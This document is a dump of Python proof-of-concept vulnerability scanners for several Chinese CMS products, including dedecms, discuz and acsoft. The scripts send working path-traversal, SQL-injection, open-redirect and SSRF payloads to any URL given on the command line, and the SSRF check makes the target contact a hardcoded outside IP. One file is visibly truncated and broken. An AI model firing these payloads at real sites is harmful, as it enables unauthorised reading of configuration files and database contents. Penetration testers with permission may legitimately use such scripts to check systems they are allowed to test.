            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        post_data = {
            "VirtualPath":"",
            "FileName":"web.config"
        }
        payload = "/WS/WebService.asmx/GetFile"
        vulnurl = self.url + payload
        try:
            # verify=False: certificate problems neither stop the probe nor get reported.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Exact header comparison; a missing Content-Type raises KeyError, which the
            # bare except below turns into the "possibly not vulnerable" message.
            if req.headers["Content-Type"] == "application/xml":
                cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在acsoft_GetFile_fileread漏洞", "white", "on_grey")

        except:
            # Bare except: connection errors, timeouts and the KeyError above all end here.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
if __name__ == "__main__":
    # Stand-alone use: one positional argument, the target base url; a missing
    # argument raises IndexError. Python warnings are silenced, which covers the
    # insecure-request warning emitted for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = acsoft_GetFile_fileread_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/pocs/acsoft/acsoft_GetXMLList_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安财软件GetXMLList任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/WS/WebServiceBase.asmx/GetXMLList中,参数strXMLFileName存在任意文件读取。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class acsoft_GetXMLList_fileread_BaseVerify:
    """Verifier for the acsoft GetXMLList file-read issue named in the module header.

    The verdict rests on a single signal: a POST to /WS/WebServiceBase.asmx/GetXMLList
    whose response carries exactly ``Content-Type: application/xml`` is reported as
    vulnerable; every other outcome, including any exception, is reported as not.
    """

    def __init__(self, url):
        # Base url of the target; ``payload`` is appended to it verbatim in run().
        self.url = url

    def run(self):
        """Send the probe and print the verdict with cprint; nothing is returned to the caller."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        post_data = {
            "strXMLFileName":"../web.config"
        }
        payload = "/WS/WebServiceBase.asmx/GetXMLList"
        vulnurl = self.url + payload
        try:
            # verify=False: certificate problems neither stop the probe nor get reported.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Exact header comparison; a missing Content-Type raises KeyError, which the
            # bare except below turns into the "possibly not vulnerable" message.
            if req.headers["Content-Type"] == "application/xml":
                cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在acsoft_GetXMLList_fileread漏洞", "white", "on_grey")

        except:
            # Bare except: connection errors, timeouts and the KeyError above all end here.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
37 |
if __name__ == "__main__":
    # Stand-alone use: one positional argument, the target base url; a missing
    # argument raises IndexError. Python warnings are silenced, which covers the
    # insecure-request warning emitted for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = acsoft_GetXMLList_fileread_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/pocs/cmseasy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/cmseasy/__init__.py
--------------------------------------------------------------------------------
/pocs/cmseasy/cmseasy_header_detail_sqli.py:
--------------------------------------------------------------------------------
1 |
2 | #!/usr/bin/env python
3 | # -*- coding: utf-8 -*-
4 | '''
5 | name: cmseasy header.php 报错注入
6 | referer: http://www.wooyun.org/bugs/wooyun-2015-0137013
7 | author: Lucifer
8 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
9 | '''
10 | import sys
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
class cmseasy_header_detail_sqli_BaseVerify:
    """Verifier for the cmseasy header.php injection issue named in the module header.

    The verdict is a body check: the probe is POSTed to /celive/live/header.php and
    the response is reported as vulnerable only when it echoes the fixed marker
    string compared for in run(); any exception is reported as "possibly not".
    NOTE(review): the ``description`` line in the module header names
    /coupon/s.php and ``fids``, which does not match the request built here —
    looks copied from another POC; confirm and correct.
    """

    def __init__(self, url):
        # Base url of the target; ``payload`` is appended to it verbatim in run().
        self.url = url

    def run(self):
        """Send the probe and print the verdict with cprint; nothing is returned to the caller."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        post_data = {
            "xajax":"Postdata",
            "xajaxargs[0]":"detail=xxxxxx'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(1=1,md5(1234)))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'1'='1
",
        }
        payload = "/celive/live/header.php"
        vulnurl = self.url + payload
        try:
            # verify=False: certificate problems neither stop the probe nor get reported.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Substring check on the whole body; a page that happens to contain the
            # marker for another reason is reported as a hit.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在cmseasy_header_detail_sqli漏洞", "white", "on_grey")

        except:
            # Bare except: connection errors and timeouts all end here.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
if __name__ == "__main__":
    # Stand-alone use: one positional argument, the target base url; a missing
    # argument raises IndexError. Python warnings are silenced, which covers the
    # insecure-request warning emitted for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = cmseasy_header_detail_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/pocs/dedecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/dedecms/__init__.py
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_download_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms download.php重定向漏洞
5 | referer: http://skyhome.cn/dedecms/357.html
6 | author: Lucifer
7 | description: 在dedecms 5.7sp1的/plus/download.php中67行存在的代码,即接收参数后未进行域名的判断就进行了跳转。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class dedecms_download_redirect_BaseVerify:
    """Verifier for the dedecms download.php open-redirect issue named in the module header.

    The probe GETs /plus/download.php with a base64 ``link`` value and reports a
    hit when the fixed marker string compared for in run() appears in the body.
    requests follows redirects, so the body examined is that of wherever the
    target redirects to — a location chosen by the POC author, not by the target.
    Two consequences for anyone running this: the scanning machine itself fetches
    that external location, and a negative result also covers "that location no
    longer serves the marker", so it does not prove the redirect is absent.
    """

    def __init__(self, url):
        # Base url of the target; ``payload`` is appended to it verbatim in run().
        self.url = url

    def run(self):
        """Send the probe and print the verdict with cprint; nothing is returned to the caller."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plus/download.php?open=1&link=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm"
        vulnurl = self.url + payload
        try:
            # verify=False: certificate problems neither stop the probe nor get reported.
            # Redirects are followed (requests' default), see the class docstring.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"100e8a82eea1ef8416e585433fd8462e" in req.text:
                cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: "+vulnurl, "blue")

            else:
                cprint("[-]不存在dedecms_download_redirect漏洞", "white", "on_grey")

        except:
            # Bare except: connection errors and timeouts all end here.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
if __name__ == "__main__":
    # Stand-alone use: one positional argument, the target base url; a missing
    # argument raises IndexError. Python warnings are silenced, which covers the
    # insecure-request warning emitted for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = dedecms_download_redirect_BaseVerify(sys.argv[1])
    testVuln.run()
39 |
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_error_trace_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms trace爆路径漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: 访问mysql_error_trace.inc,mysql trace报错路径泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class dedecms_error_trace_disclosure_BaseVerify:
    """Probe /data/mysql_error_trace.inc, the MySQL error trace DedeCMS writes under /data.

    NOTE(review): this listing is truncated. Everything between the original
    lines 26 and 32 (the response check and both result branches) was lost in
    extraction — apparently from a '<' on line 26 up to the '>' of "====>" on
    line 32 — so the code below is not syntactically complete. Restore it from
    upstream before relying on it.
    """
    def __init__(self, url):
        # Base URL of the target; the .inc path is appended verbatim.
        self.url = url

    def run(self):
        """Fetch the trace file and print whether it is exposed (see class note)."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # If the file is served, it leaks the install path (and failing SQL) to
        # anyone who can fetch it.
        payload = "/data/mysql_error_trace.inc"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # --- truncated in this listing: the original check and result branches are missing here ---
            if r"可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    dedecms_error_trace_disclosure_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_recommend_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms recommend.php SQL注入
5 | referer: http://blog.csdn.net/change518/article/details/20564207
6 | author: Lucifer
7 | description: 1.首先执行到plus/recommand.php,包含了include/common.inc.php
8 | 2.只要提交的URL中不包含cfg_|GLOBALS|_GET|_POST|_COOKIE,即可通过检查,_FILES[type][tmp_name]被带入
9 | 3.在29行处,URL参数中的_FILES[type][tmp_name],$_key为type,$$_key即为$type,从而导致了$type变量的覆盖
10 | 4.回到recommand.php中,注入语句被带入数据库查询
11 | '''
12 | import sys
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
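class dedecms_recommend_sqli_BaseVerify:
    """Check for the DedeCMS plus/recommend.php variable-overwrite SQL injection.

    The probe smuggles ``_FILES[type][tmp_name]`` through the query string (see
    the module docstring) so that ``$type`` is overwritten with a UNION SELECT.
    md5(1234) is selected as a marker; it only shows up in the page if the
    injected SELECT was executed.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns None.

        Red line: marker reflected (injection executed). Grey line: not reflected.
        Cyan line: the request itself failed — the error is printed rather than
        swallowed by a bare ``except:``, so Ctrl-C and bugs are no longer reported
        as "probably not vulnerable".
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27AnD+ChAr(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(1234),5,6,7,8,9%20FrOm%20`%23@__admin`%23"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        # 81dc9bdb... is md5("1234"), the marker selected by the payload.
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在dedecms_recommend_sqli漏洞", "white", "on_grey")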
36 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    dedecms_recommend_sqli_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_search_typeArr_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms search.php SQL注入漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: dedecms /plus/search.php typeArr存在SQL注入,由于有的waf会拦截自行构造EXP。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
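class dedecms_search_typeArr_sqli_BaseVerify:
    """Error-based check for the DedeCMS /plus/search.php ``typeArr`` SQL injection.

    An array key containing ``uNion`` is passed as ``typeArr[ uNion ]``; if the key
    reaches the query unsanitised the page shows DedeCMS's SQL error block, which
    is what the response check looks for. Targets with SQL error display turned
    off will not be detected even if injectable.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plus/search.php?keyword=test&typeArr[%20uNion%20]=a"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        # Both strings come from DedeCMS's SQL error page.
        if r"Error infos" in req.text and r"Error sql" in req.text:
            cprint("[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在dedecms_search_typeArr_sqli漏洞", "white", "on_grey")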
33 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    dedecms_search_typeArr_sqli_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/dedecms/dedecms_version.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms版本探测
5 | referer: unknow
6 | author: Lucifer
7 | description: dedecms版本探测
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 |
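class dedecms_version_BaseVerify:
    """Read DedeCMS's release stamp from /data/admin/ver.txt and map it to a version label."""

    # Release stamp (YYYYMMDD, exactly as served in ver.txt) -> version label, as
    # recorded by the original author. Kept verbatim, odd-looking entries included.
    VER_HISTORY = {
        '20080307': 'v3 or v4 or v5',
        '20080324': 'v5 above',
        '20080807': '5.1 or 5.2',
        '20081009': 'v5.1sp',
        '20081218': '5.1sp',
        '20090810': '5.5',
        '20090912': '5.5',
        '20100803': '5.6',
        '20101021': '5.3',
        '20111111': 'v5.7 or v5.6 or v5.5',
        '20111205': '5.7.18',
        '20111209': '5.6',
        '20120430': '5.7SP or 5.7 or 5.6',
        '20120621': '5.7SP1 or 5.7 or 5.6',
        '20120709': '5.6',
        '20121030': '5.7SP1 or 5.7',
        '20121107': '5.7',
        '20130608': 'V5.6-Final',
        '20130922': 'V5.7SP1',
    }

    def __init__(self, url):
        # Base URL of the target; the ver.txt path is appended verbatim.
        self.url = url

    def check_ver(self, arg):
        """Return the label of the newest known release stamp that is <= ``arg``.

        ``arg`` is the digit string read from ver.txt. Stamps are compared as
        strings, which is sound because every known stamp has the same 8-digit
        layout. Returns "unknown" when ``arg`` precedes every known stamp (the
        original indexed past the list start and raised KeyError there).

        Bug fixed: the original looked up the entry *before* the match position,
        so an exact stamp (e.g. '20130922') was reported as the previous release.
        """
        known = [stamp for stamp in self.VER_HISTORY if stamp <= arg]
        if not known:
            return "unknown"
        return self.VER_HISTORY[max(known)]

    def run(self):
        """Fetch ver.txt and print the stamp plus its version label; returns None.

        The body is stripped before matching so "20130922\\r\\n" is accepted (the
        original ``^(\\d+)$`` failed on CRLF). Request errors are printed with the
        exception instead of being swallowed by a bare ``except:``.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/data/admin/ver.txt"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        stamp = req.text.strip()
        if re.fullmatch(r"\d+", stamp):
            cprint("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s" % (stamp, self.check_ver(stamp)),
                   "green")
        else:
            cprint("[-]不存在dedecms_version漏洞", "white", "on_grey")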
62 |
63 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    dedecms_version_BaseVerify(target_url).run()
68 |
--------------------------------------------------------------------------------
/pocs/discuz/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/discuz/__init__.py
--------------------------------------------------------------------------------
/pocs/discuz/discuz_focus_flashxss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz X3 focus.swf flashxss漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件中focus.swf存在flashxss。
8 | '''
9 | import sys
10 | import urllib
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
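class discuz_focus_flashxss_BaseVerify:
    """Fingerprint the known-vulnerable Discuz! X3 /static/image/common/focus.swf by MD5.

    MD5 is used here purely as a build fingerprint (matching the digest the
    original author recorded), not for anything security-sensitive.
    """

    def __init__(self, url):
        # Base URL of the target; the .swf path is appended verbatim.
        self.url = url

    def run(self):
        """Download focus.swf, compare its MD5 with the known digest, print the verdict.

        Fixes over the original: the download used ``urllib.request.urlopen`` with
        no timeout (a stalled host hung the whole scan) and relied on
        ``urllib.request`` being loaded as a side effect of ``import urllib``;
        it now goes through ``requests`` with the same timeout/UA as the other
        probes. The digest is compared with ``==`` rather than substring ``in``,
        and request errors are printed instead of swallowed by a bare ``except:``.
        Returns None.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        flash_md5 = "c16a7c6143f098472e52dd13de85527f"
        payload = "/static/image/common/focus.swf"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        md5_value = hashlib.md5(req.content).hexdigest()
        if md5_value == flash_md5:
            cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在discuz_focus_flashxss漏洞", "white", "on_grey")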
38 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    discuz_focus_flashxss_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/discuz/discuz_forum_message_ssrf.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz论坛forum.php参数message SSRF漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: trs infogate插件 blind XML实体注入。
8 | '''
9 | import sys
10 | import time
11 | import hashlib
12 | import datetime
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
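class discuz_forum_message_ssrf_BaseVerify:
    """Blind SSRF check for Discuz! forum.php?mod=ajax&action=downremoteimg.

    The forum is asked to fetch a remote image whose filename carries a one-off
    token; the verdict is read back from ``/web.log`` on the callback host. A hit
    therefore proves the target made an outbound HTTP request.

    NOTE(review): ``formhash`` is hard-coded (09cec465); builds that validate it
    per session may reject the request — confirm before trusting a negative.
    """

    # Out-of-band host the PoC historically used. It is NOT operated by whoever
    # runs this scanner: every scan tells that host which targets were probed, and
    # the verdict is whatever its /web.log claims. Run your own listener (port 6868
    # for the image fetch, port 80 serving /web.log) and pass it as ``callback_host``.
    DEFAULT_CALLBACK_HOST = "45.76.158.91"

    def __init__(self, url, callback_host=DEFAULT_CALLBACK_HOST):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url
        self.callback_host = callback_host

    def run(self):
        """Trigger the fetch, wait, then look for the token in the callback log; returns None.

        The token is random (``secrets``) instead of md5(current second): two scans
        started in the same second no longer share a token, and a third party
        cannot predict it to plant a fake hit in the log. Network errors on either
        request are printed rather than swallowed by a bare ``except:``.
        """
        import secrets  # local import: the module's import block is left untouched

        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        }
        token = secrets.token_hex(16)
        payload = ("/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://"
                   + self.callback_host + ":6868/" + token + ".jpg[/img]&formhash=09cec465")
        vulnurl = self.url + payload
        eye_url = "http://" + self.callback_host + "/web.log"
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Give the target time to perform its own fetch before reading the log.
            time.sleep(6)
            log = requests.get(eye_url, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        if token in log.text:
            cprint("[+]存在discuz论坛forum.php参数message SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")
        else:
            cprint("[-]不存在discuz_forum_message_ssrf漏洞", "white", "on_grey")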
42 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    discuz_forum_message_ssrf_BaseVerify(target_url).run()
47 |
--------------------------------------------------------------------------------
/pocs/discuz/discuz_plugin_ques_sqli.py:
--------------------------------------------------------------------------------
1 |
2 | #!/usr/bin/env python
3 | # -*- coding: utf-8 -*-
4 | '''
5 | name: discuz问卷调查参数orderby注入漏洞
6 | referer: http://0day5.com/archives/3184/
7 | author: Lucifer
8 | description: 文件plugin.php中,参数orderby存在SQL注入。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
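class discuz_plugin_ques_sqli_BaseVerify:
    """Error-based check for the Discuz! nds_up_ques plugin ``orderby`` SQL injection.

    The payload calls UpdateXml() with md5(1234) so the marker comes back inside
    the XPATH syntax error; the error message truncates the value, which is why
    the marker compared below is 31 characters long (md5("1234") minus its last
    digit).
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
            cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在discuz_plugin_ques_sqli漏洞", "white", "on_grey")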
34 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    discuz_plugin_ques_sqli_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/discuz/discuz_x25_path_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: discuz! X2.5 物理路径泄露漏洞
5 | referer: http://www.uedbox.com/discuzx25-explosive-path/
6 | author: Lucifer
7 | description: 报错导致路径泄露。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
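class discuz_x25_path_disclosure_BaseVerify:
    """Request Discuz! X2.5 files that fatal out when loaded directly, and read the path from the PHP error."""

    # PHP's "Fatal error: ... in /abs/path/file.php on line N" text.
    _FATAL_RE = re.compile(r'Fatal error.* in ([^<]+) on line (\d+)')

    def __init__(self, url):
        # Base URL of the target; each probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Try each probe path and print a verdict per path; returns None.

        Fix over the original: the ``try`` wrapped the whole loop, so one failed
        request (timeout, refused connection) aborted the remaining probes. Each
        request now has its own handler, and the error is printed rather than
        swallowed by a bare ``except:``.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payloads = ["/uc_server/control/admin/db.php",
                    "/source/plugin/myrepeats/table/table_myrepeats.php",
                    "/install/include/install_lang.php"]
        for payload in payloads:
            vulnurl = self.url + payload
            try:
                # verify=False is deliberate for scanning; __main__ silences the warning.
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            except requests.RequestException as exc:
                cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
                continue
            match = self._FATAL_RE.search(req.text)
            if match:
                cprint("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: "+vulnurl+"\tGet物理路径: "+match.group(1), "green")
            else:
                cprint("[-]不存在discuz_x25_path_disclosure漏洞", "white", "on_grey")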
38 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    discuz_x25_path_disclosure_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/dreamgallery/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/dreamgallery/__init__.py
--------------------------------------------------------------------------------
/pocs/dreamgallery/dreamgallery_album_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dreamgallery album.php SQL注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件album.php中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
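class dreamgallery_album_id_sqli_BaseVerify:
    """UNION-based check for the DreamGallery /dream/album.php ``id`` SQL injection.

    The injected SELECT concatenates version(), md5(1234) and database(); only
    the md5 marker is checked, the other two fields are there for the operator
    reading the page.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/dream/album.php?id=-1+/*!12345union*/+/*!12345select*/+1,group_concat(version(),0x3a,md5(1234),0x3a,database()),3,4,5,6,7,8,9,10--+"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
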